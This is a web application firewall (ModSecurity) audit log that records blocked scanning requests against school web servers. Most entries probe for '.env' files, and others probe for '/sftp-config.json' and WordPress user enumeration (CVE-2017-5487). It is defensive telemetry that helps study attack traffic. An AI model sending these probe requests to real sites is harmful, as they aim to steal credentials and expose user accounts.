REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738118316786 703 (- - -) Stopwatch2: 1748738118316786 703; combined=273, p1=242, p2=0, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90f0e81a-Z-- --d01f202f-A-- [01/Jun/2025:07:35:18 +0700] aDugRkaTRmdfB-FaJjm5hAAAABM 103.236.140.4 59580 103.236.140.4 8181 --d01f202f-B-- GET /services/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --d01f202f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d01f202f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738118686819 675 (- - -) Stopwatch2: 1748738118686819 675; combined=250, p1=217, p2=0, p3=0, p4=0, p5=32, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d01f202f-Z-- --c1c91535-A-- [01/Jun/2025:07:35:19 +0700] aDugRwQ4kZQGAOBHoB5CqAAAAM4 103.236.140.4 59582 103.236.140.4 8181 --c1c91535-B-- GET /config/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --c1c91535-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1c91535-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738119050947 664 (- - -) Stopwatch2: 1748738119050947 664; combined=257, p1=224, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1c91535-Z-- --de8f564f-A-- [01/Jun/2025:07:35:19 +0700] aDugR0aTRmdfB-FaJjm5hQAAABQ 103.236.140.4 59584 103.236.140.4 8181 --de8f564f-B-- GET /service/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --de8f564f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de8f564f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738119417761 749 (- - -) Stopwatch2: 1748738119417761 749; combined=334, p1=302, p2=0, p3=0, p4=0, p5=32, sr=143, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de8f564f-Z-- --088db51f-A-- [01/Jun/2025:07:35:19 +0700] aDugR0aTRmdfB-FaJjm5hgAAABI 103.236.140.4 59586 103.236.140.4 8181 --088db51f-B-- GET /test/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --088db51f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --088db51f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738119794726 716 (- - -) Stopwatch2: 1748738119794726 716; combined=304, p1=271, p2=0, p3=0, p4=0, p5=32, sr=114, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --088db51f-Z-- --4e9e074c-A-- [01/Jun/2025:07:35:20 +0700] aDugSAQ4kZQGAOBHoB5CqQAAANI 103.236.140.4 59588 103.236.140.4 8181 --4e9e074c-B-- GET /demo/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --4e9e074c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e9e074c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738120145766 637 (- - -) Stopwatch2: 1748738120145766 637; combined=253, p1=220, p2=0, p3=0, p4=0, p5=32, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e9e074c-Z-- --fc957601-A-- [01/Jun/2025:07:35:20 +0700] aDugSAQ4kZQGAOBHoB5CqgAAANE 103.236.140.4 59592 103.236.140.4 8181 --fc957601-B-- GET /local/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --fc957601-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc957601-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738120869468 670 (- - -) Stopwatch2: 1748738120869468 670; combined=293, p1=267, p2=0, p3=0, p4=0, p5=26, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc957601-Z-- --2a55123b-A-- [01/Jun/2025:07:35:21 +0700] aDugSUaTRmdfB-FaJjm5iAAAABY 103.236.140.4 59594 103.236.140.4 8181 --2a55123b-B-- GET /system/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --2a55123b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a55123b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738121223778 654 (- - -) Stopwatch2: 1748738121223778 654; combined=250, p1=219, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a55123b-Z-- --3d118223-A-- [01/Jun/2025:07:35:21 +0700] aDugSUaTRmdfB-FaJjm5iQAAABg 103.236.140.4 59596 103.236.140.4 8181 --3d118223-B-- GET /shop/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --3d118223-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d118223-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738121583696 669 (- - -) Stopwatch2: 1748738121583696 669; combined=293, p1=261, p2=0, p3=0, p4=0, p5=32, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d118223-Z-- --69cce12c-A-- [01/Jun/2025:07:35:21 +0700] aDugSe4LjVe0Eerk_ZaIAwAAAEU 103.236.140.4 59598 103.236.140.4 8181 --69cce12c-B-- GET /blog1/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --69cce12c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69cce12c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738121937909 859 (- - -) Stopwatch2: 1748738121937909 859; combined=349, p1=309, p2=0, p3=0, p4=0, p5=40, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69cce12c-Z-- --cf83b66f-A-- [01/Jun/2025:07:35:22 +0700] aDugSkaTRmdfB-FaJjm5igAAABc 103.236.140.4 59600 103.236.140.4 8181 --cf83b66f-B-- GET /site/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --cf83b66f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf83b66f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738122299116 687 (- - -) Stopwatch2: 1748738122299116 687; combined=326, p1=295, p2=0, p3=0, p4=0, p5=30, sr=138, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf83b66f-Z-- --65c3196b-A-- [01/Jun/2025:07:41:20 +0700] aDuhsO4LjVe0Eerk_ZaIFAAAAEY 103.236.140.4 59676 103.236.140.4 8181 --65c3196b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 206.189.18.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 206.189.18.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --65c3196b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --65c3196b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748738480629313 3648 (- - -) Stopwatch2: 1748738480629313 3648; combined=1527, p1=478, p2=1017, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --65c3196b-Z-- --eb06af77-A-- [01/Jun/2025:07:41:34 +0700] aDuhvu4LjVe0Eerk_ZaIFQAAAEU 103.236.140.4 59678 103.236.140.4 8181 --eb06af77-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.151 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (BlackBerry; U; BlackBerry 9930; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.267 Mobile Safari/534.11+ Accept-Charset: utf-8 --eb06af77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb06af77-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738494399503 813 (- - -) Stopwatch2: 1748738494399503 813; combined=333, p1=297, p2=0, p3=0, p4=0, p5=36, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb06af77-Z-- --5b6b2c16-A-- [01/Jun/2025:07:43:18 +0700] aDuiJu4LjVe0Eerk_ZaIGAAAAEs 103.236.140.4 59692 103.236.140.4 8181 --5b6b2c16-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.166.206.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.166.206.118 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5b6b2c16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5b6b2c16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748738598551801 3522 (- - -) Stopwatch2: 1748738598551801 3522; combined=1545, p1=551, p2=955, p3=0, p4=0, p5=38, sr=120, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5b6b2c16-Z-- --956abf42-A-- [01/Jun/2025:07:56:21 +0700] aDulNQQHT18O7PnXxsQIdQAAAIE 103.236.140.4 59888 103.236.140.4 8181 --956abf42-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/7.0.4(0x17000428) NetType/WIFI Language/zh_CN Accept-Charset: utf-8 --956abf42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --956abf42-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748739381833607 28235 (- - -) Stopwatch2: 1748739381833607 28235; combined=55182, p1=324, p2=0, p3=0, p4=0, p5=27448, sr=114, sw=1, l=0, gc=27409 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --956abf42-Z-- --83f58e18-A-- [01/Jun/2025:08:04:01 +0700] aDunAQQHT18O7PnXxsQIiwAAAIE 103.236.140.4 60076 103.236.140.4 8181 --83f58e18-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.196.179.139 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.196.179.139 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --83f58e18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83f58e18-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748739841352379 3184 (- - -) Stopwatch2: 1748739841352379 3184; combined=1409, p1=483, p2=835, p3=0, p4=0, p5=91, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83f58e18-Z-- --acf51075-A-- [01/Jun/2025:08:27:22 +0700] aDusekaTRmdfB-FaJjm5xAAAAA4 103.236.140.4 60674 103.236.140.4 8181 --acf51075-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.108.120.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.108.120.40 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --acf51075-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --acf51075-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748741242056574 3396 (- - -) Stopwatch2: 1748741242056574 3396; combined=1518, p1=528, p2=954, p3=0, p4=0, p5=36, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --acf51075-Z-- --389c7d19-A-- [01/Jun/2025:08:44:03 +0700] aDuwYwQ4kZQGAOBHoB5DEAAAAMM 103.236.140.4 32810 103.236.140.4 8181 --389c7d19-B-- GET /sftp-config.json HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 193.32.126.214 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 193.32.126.214 X-Forwarded-Proto: http Connection: close --389c7d19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --389c7d19-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748742243110328 787 (- - -) Stopwatch2: 1748742243110328 787; combined=254, p1=210, p2=0, p3=0, p4=0, p5=44, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --389c7d19-Z-- --6ce3d328-A-- [01/Jun/2025:08:44:03 +0700] aDuwY-4LjVe0Eerk_ZaIhQAAAFY 103.236.140.4 32808 103.236.140.4 8181 --6ce3d328-B-- GET /sftp-config.json HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 193.32.126.214 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 193.32.126.214 X-Forwarded-Proto: http Connection: close --6ce3d328-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ce3d328-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. 
